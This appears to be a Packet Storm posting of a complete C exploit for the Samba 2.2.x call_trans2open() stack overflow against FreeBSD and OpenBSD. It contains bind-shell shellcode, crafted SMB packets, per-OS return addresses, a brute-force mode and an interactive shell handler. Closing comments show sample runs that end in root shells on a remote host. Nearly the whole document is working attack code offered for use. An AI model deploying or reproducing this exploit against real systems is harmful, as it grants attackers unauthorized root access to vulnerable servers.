FreeBSD and OpenBSD remote Samba v2.2.x call_trans2open i386 buffer overflow exploit. Tested against OpenBSD 3.0 and FreeBSD 4.6.2-RELEASE with Samba v2.2.x. Includes support for target brute forcing. Information about the vulnerability is available here.
f677c9d6fb78104c365cb38722fea0540f263fc2adf56d38ded0fbb35c2f2573/*
**
** [+] Title: Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
** 11/Apr/2003
** [+] Exploit code: 0x82-Remote.54AAb4.xpl.c
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** source/smbd/trans2.c:
**
** line:205 static int call_trans2open(connection_struct *conn, char *inbuf, char *outbuf, int bufsize,
** line:206 char **pparams, int total_params, char **ppdata, int total_data)
** line:207 {
** [...]
** line:219 char *pname;
** line:220 int16 namelen;
** [...]
** line:222 pstring fname; // source/include/smb.h:
** // line:162 #define PSTRING_LEN 1024
** // line:165 typedef char pstring[PSTRING_LEN];
** [...]
** line:250 namelen = strlen(pname)+1;
** line:251
** line:252 StrnCpy(fname,pname,namelen); // here.
**
** reply_trans2() function:
**
** line:3173 int reply_trans2(connection_struct *conn, char *inbuf,char *outbuf,int length,int bufsize)
** [...]
** line:3358 outsize = call_trans2open(conn, inbuf, outbuf, bufsize,
** line:3359 ¶ms, total_params, &data, total_data);
** line:3360 END_PROFILE_NESTED(Trans2_open);
** line:3361 break;
**
** Visual point that change flowing of this program,
** happen after overwrited variables.
**
** Detailed information references digitaldefense's Advisory.
**
** http://www.digitaldefense.net/labs/advisories/DDI-1013.txt
**
** Also, thank about eSDee's exploit that remind Samba application communication method.
** --
** Thank you.
**
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
struct os {
int num;
char *ost;
u_long shell;
};
struct os plat[]=
{
{
0,"FreeBSD 4.6.2-RELEASE #0 i386, Samba v2.2.x",
/*
v2.2.0 exploited successfully. (Brute-Force mode)
v2.2.1a exploited successfully. (Brute-Force mode)
v2.2.2 exploited successfully. (Brute-Force mode)
v2.2.3 exploited successfully. (Default mode)
v2.2.4 exploited successfully. (Default mode)
v2.2.5 exploited successfully. (Default mode)
v2.2.6 exploited successfully. (Default mode)
v2.2.7 exploited successfully. (Default mode)
v2.2.8 exploited successfully. (Default mode)
*/
0xbfbff482
},
{
1,"OpenBSD 3.0 GENERIC#94 i386, Samba v2.2.x",
/*
v2.2.0 exploited successfully. (Brute-Force mode)
v2.2.1a exploited successfully. (Brute-Force mode)
v2.2.2 exploited successfully. (Brute-Force mode)
v2.2.3 exploited successfully. (Default mode)
v2.2.4 exploited successfully. (Default mode)
v2.2.5 exploited successfully. (Default mode)
v2.2.6 exploited successfully. (Default mode)
v2.2.7 exploited successfully. (Default mode)
v2.2.8 exploited successfully. (Default mode)
*/
0xdfbfd482
},
{
2,NULL,0
}
};
char shellcode[]=
/* 86bytes portbinding shellcode by bighawk */
"\x31\xc9" // xor ecx, ecx
"\xf7\xe1" // mul ecx
"\x51" // push ecx
"\x41" // inc ecx
"\x51" // push ecx
"\x41" // inc ecx
"\x51" // push ecx
"\x51" // push ecx
"\xb0\x61" // mov al, 97
"\xcd\x80" // int 80h
"\x89\xc3" // mov ebx, eax
"\x52" // push edx
"\x66\x68\x27\x10" // push word 4135
"\x66\x51" // push cx
"\x89\xe6" // mov esi, esp
"\xb1\x10" // mov cl, 16
"\x51" // push ecx
"\x56" // push esi
"\x50" // push eax
"\x50" // push eax
"\xb0\x68" // mov al, 104
"\xcd\x80" // int 80h
"\x51" // push ecx
"\x53" // push ebx
"\x53" // push ebx
"\xb0\x6a" // mov al, 106
"\xcd\x80" // int 80h
"\x52" // push edx
"\x52" // push edx
"\x53" // push ebx
"\x53" // push ebx
"\xb0\x1e" // mov al, 30
"\xcd\x80" // int 80h
"\xb1\x03" // mov cl, 3
"\x89\xc3" // mov ebx, eax
"\xb0\x5a" // mov al, 90
"\x49" // dec ecx
"\x51" // push ecx
"\x53" // push ebx
"\x53" // push ebx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf5" // loop-10
"\x51" // push ecx
"\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
"\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x54" // push esp
"\x53" // push ebx
"\x53" // push ebx
"\xb0\x3b" // mov al, 59
"\xcd\x80"; // int 80h
#define BRUTE_AT (64)
#define SH_PORT (10000)
#define ATK_PORT (139)
#define DF_NOP (0x41)
#define __BUF_LEN (0x00000463)
#define __LEN_PAD (0x0000012c)
void banrl();
int re_connt(int sock,int type);
void usage(char *p_name);
int setsock(char *host,int port);
void send_recv_sh(int sock);
int __atk_code_send_recv(int sock,u_long shell);
int __atk_code_send_recv(int sock,u_long shell)
{
int eat_buf_set=0,atk_buf_pos=0;
char atk_buf[0x960+5];
char its_exploit_packet[]={
0x00,0x04,0x09,0x60,0xff,0x53,0x4d,0x42,
0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x64,0x00,0x00,0x00,0x00,0xd0,0x07,0x0c,
0x00,0xd0,0x07,0x0c,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,
0x07,0x43,0x00,0x0c,0x00,0x14,0x08,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x90,
0x00
};
char its_first_time_conn[]={
0x00,0x00,0x00,0x2e,0xff,0x53,0x4d,0x42,
0x73,0x00,0x00,0x00,0x00,0x08,0x01,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x64,0x00,0x01,0x00,0x00,0xff,0x00,0x00,
0x00,0x00,0x20,0x02,0x00,0x01,0x00,0x00,
0x00,0x00
};
char its_second_time_conn[]={
0x00,0x00,0x00,0x3c,0xff,0x53,0x4d,0x42,
0x70,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x0c,0x20,
0x64,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x5c,0x5c,0x69,0x70,0x63,0x24,0x25,0x6e,
0x6f,0x62,0x6f,0x64,0x79,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x49,0x50,0x43,0x24
};
int first_packet_len=sizeof(its_first_time_conn);
int second_packet_len=sizeof(its_second_time_conn);
memset((char *)atk_buf,0,sizeof(atk_buf));
memcpy(atk_buf,its_first_time_conn,sizeof(its_first_time_conn));
send(sock,atk_buf,first_packet_len,0);
recv(sock,atk_buf,sizeof(atk_buf)-1,0);
memset((char *)atk_buf,0,sizeof(atk_buf));
memcpy(atk_buf,its_second_time_conn,sizeof(its_second_time_conn));
send(sock,atk_buf,second_packet_len,0);
recv(sock,atk_buf,sizeof(atk_buf)-1,0);
memset((char *)atk_buf,0,sizeof(atk_buf));
memcpy(atk_buf+atk_buf_pos,its_exploit_packet,sizeof(its_exploit_packet));
atk_buf_pos+=sizeof(its_exploit_packet);
memset(atk_buf+atk_buf_pos,DF_NOP,((__BUF_LEN-__LEN_PAD)-strlen(shellcode)-atk_buf_pos));
atk_buf_pos+=((__BUF_LEN-__LEN_PAD)-strlen(shellcode)-atk_buf_pos);
memcpy(atk_buf+atk_buf_pos,shellcode,strlen(shellcode));
atk_buf_pos+=strlen(shellcode);
memset(atk_buf+atk_buf_pos,DF_NOP,__LEN_PAD);
atk_buf_pos+=(__LEN_PAD);
#ifdef __DEBUG
sleep(10);
#endif
{
*(long *)&atk_buf[atk_buf_pos]=(shell-(0x82*2));// fake fp
atk_buf_pos+=4;
*(long *)&atk_buf[atk_buf_pos]=(shell);// retaddr;
atk_buf_pos+=4;
*(long *)&atk_buf[atk_buf_pos]=(shell-(0x82*2));// fake fp
atk_buf_pos+=4;
}
send(sock,atk_buf,sizeof(atk_buf)-1,0);
}
int main(int argc,char *argv[])
{
int sock,whtl,type=0,brute_f=0;
char tg_host[0x82]="localhost";
u_long shell=plat[type].shell;
(void)banrl();
if(argc<2)
{
(void)usage(argv[0]);
}
while((whtl=getopt(argc,argv,"H:h:S:s:T:t:IiB:b"))!=-1)
{
extern char *optarg;
switch(whtl)
{
case 'H':
case 'h':
memset((char *)tg_host,0,sizeof(tg_host));
strncpy(tg_host,optarg,sizeof(tg_host)-1);
break;
case 'S':
case 's':
shell=strtoul(optarg,0,0);
break;
case 'T':
case 't':
if((type=atoi(optarg))>1)
{
(void)usage(argv[0]);
}
else shell=plat[type].shell;
break;
case 'I':
case 'i':
(void)usage(argv[0]);
break;
case 'B':
case 'b':
brute_f++;
break;
case '?':
fprintf(stderr," Try `%s -i' for more information.\n\n",argv[0]);
exit(-1);
break;
}
}
if(brute_f)
{
fprintf(stdout," **\n ** OK, It's good selection, Attack tries %d times.\n",BRUTE_AT);
fprintf(stdout," ** If work process is boring, drink coffee and wait. hehe ;-D\n **\n\n");
fprintf(stdout," [*] Brute-Force mode:\n\n");
fprintf(stdout," |----+----+----+----+----+----+----+----+----+----+----+----+----|");
fprintf(stdout,"\n |");
for(brute_f=0;brute_f<BRUTE_AT;brute_f++)
{
fflush(stdout);
fprintf(stdout,"=");
shell+=(0x100);
sock=(int)setsock(tg_host,ATK_PORT);
if((int)re_connt(sock,0)==-1)
{
while(!(brute_f>=BRUTE_AT-1))
{
fprintf(stdout,"=");
brute_f++;
}
fprintf(stdout,"|\n\n");
fprintf(stderr," [-] Connect Failed.\n\n");
exit(-1);
}
__atk_code_send_recv(sock,shell);
close(sock);
sleep(2);
sock=(int)setsock(tg_host,SH_PORT);
if((int)re_connt(sock,0)==-1)
{
continue;
}
while(!(brute_f>=BRUTE_AT-1))
{
fprintf(stdout,"=");
brute_f++;
}
fprintf(stdout,"|\n\n");
fprintf(stdout," [+] Shellcode address: %p\n",shell);
fprintf(stdout," [*] Brute-Force end !!\n\n");
fprintf(stdout," **\n ** Bind shellcode is port 10000.\n");
fprintf(stdout," ** If bindshell port number was changed, change connection port.\n **\n\n");
(void)send_recv_sh(sock);
}
fprintf(stdout,"|\n\n **\n");
fprintf(stdout," ** Brute-Force exploit failed. Reason is simple.\n **\n");
fprintf(stdout," ** Could not search shellcode's position during %d times.\n",BRUTE_AT);
fprintf(stdout," ** Or, Operating System's target that we attack isn't.\n");
fprintf(stdout," ** OOops ! is server Samba version doubtful ??\n **\n\n");
exit(-1);
}
else
{
fprintf(stdout," [0] Target: %s\n",plat[type].ost);
fprintf(stdout," [1] Set socket.\n");
sock=(int)setsock(tg_host,ATK_PORT);
(int)re_connt(sock,1);
fprintf(stdout," [2] Make shellcode & Send Packet.\n");
__atk_code_send_recv(sock,shell);
close(sock);
fprintf(stdout," [3] Trying %s:%d.\n",tg_host,SH_PORT);
sleep(2);
sock=(int)setsock(tg_host,SH_PORT);
(int)re_connt(sock,1);
fprintf(stdout," [*] Connected to %s:%d.\n",tg_host,SH_PORT);
(void)send_recv_sh(sock);
}
}
int setsock(char *hostip,int port)
{
int sock;
struct hostent *he;
struct sockaddr_in x82;
if((he=gethostbyname(hostip))==NULL)
{
return(-1);
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
{
return(-1);
}
x82.sin_family=AF_INET;
x82.sin_port=htons(port);
x82.sin_addr=*((struct in_addr *)he->h_addr);
memset(&(x82.sin_zero),0,8);
if(connect(sock,(struct sockaddr *)&x82,sizeof(struct sockaddr))==-1)
{
return(-1);
}
return(sock);
}
int re_connt(int sock,int type)
{
if(sock==-1)
{
if(type)
{
fprintf(stderr," [-] Connect Failed.\n\n");
exit(-1);
}
else return(-1);
}
}
void send_recv_sh(int sock)
{
int pk;
struct timeval tm;
char *t_cmd="su -l\n";
char *n_cmd="uname -a;id;exec sh -i\n";
char rbuf[1024];
fd_set rset;
memset((char *)rbuf,0,sizeof(rbuf));
fprintf(stdout," [*] Executed shell successfully !\n");
fprintf(stdout," [*] Command: # su -l; uname -a; id; exec sh -i\n\n");
send(sock,t_cmd,strlen(t_cmd),0);
send(sock,n_cmd,strlen(n_cmd),0);
tm.tv_sec=10;
tm.tv_usec=0;
while(1)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,&tm);
if(FD_ISSET(sock,&rset))
{
pk=read(sock,rbuf,sizeof(rbuf)-1);
if(pk<=0)
{
fprintf(stdout," [*] Happy-Exploit\n\n");
close(sock);
exit(0);
}
rbuf[pk]=0;
fprintf(stdout,"%s",rbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
pk=read(STDIN_FILENO,rbuf,sizeof(rbuf)-1);
if(pk>0)
{
rbuf[pk]=0;
write(sock,rbuf,pk);
}
}
}
return;
}
void banrl()
{
fprintf(stdout,"\n Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD\n");
fprintf(stdout," by Xpl017Elz.\n\n");
}
void usage(char *p_name)
{
int r_s=0;
fprintf(stdout," Usage: %s -option [argument]\n",p_name);
fprintf(stdout,"\n\t-h - hostname. (default: localhost)\n");
fprintf(stdout,"\t-s - shellcode. (select target)\n");
fprintf(stdout,"\t-t - target number.\n");
fprintf(stdout,"\t-b - auto brute-force attack mode.\n");
fprintf(stdout,"\t-i - help information.\n\n");
fprintf(stdout," Select target number:\n\n");
for(;;)
{
if(plat[r_s].ost==NULL)
break;
else fprintf(stdout,"\t{%d} %s\n",plat[r_s].num,plat[r_s].ost);
r_s++;
}
fprintf(stdout,"\n Example> %s -hlocalhost -s 0x82828282\n\n",p_name);
exit(-1);
}
/*
**
** OpenBSD exploit:
** --
** bash$ ./0x82-Remote.54AAb4.xpl -h 61.37.xxx.xx -t1
**
** Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
** by Xpl017Elz.
**
** [0] Target: OpenBSD 3.0 GENERIC#94 i386, Samba v2.2.x
** [1] Set socket.
** [2] Make shellcode & Send Packet.
** [3] Trying 61.37.xxx.xx:10000.
** [*] Connected to 61.37.xxx.xx:10000.
** [*] Executed shell successfully !
** [*] Command: # su -l; uname -a; id; exec sh -i
**
** tset: standard error: Operation not supported
** OpenBSD testsub 3.0 GENERIC#94 i386
** uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
** sh: No controlling tty (open /dev/tty: Device not configured)
** sh: Can't find tty file descriptor
** sh: warning: won't have full job control
** #
** --
**
** FreeBSD exploit:
** --
** bash$ ./0x82-Remote.54AAb4.xpl -h 61.37.xxx.xx -t0
**
** Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
** by Xpl017Elz.
**
** [0] Target: FreeBSD 4.6.2-RELEASE #0 i386, Samba v2.2.x
** [1] Set socket.
** [2] Make shellcode & Send Packet.
** [3] Trying 61.37.xxx.xx:10000.
** [*] Connected to 61.37.xxx.xx:10000.
** [*] Executed shell successfully !
** [*] Command: # su -l; uname -a; id; exec sh -i
**
** Warning: no access to tty (Bad file descriptor).
** Thus no job control in this shell.
** FreeBSD localhost 4.6.2-RELEASE FreeBSD 4.6.2-RELEASE #0: Wed Aug 14 21:23:26 GMT 2002
** murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC i386
** uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
** sh: can't access tty; job control turned off
** #
** --
**
*/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed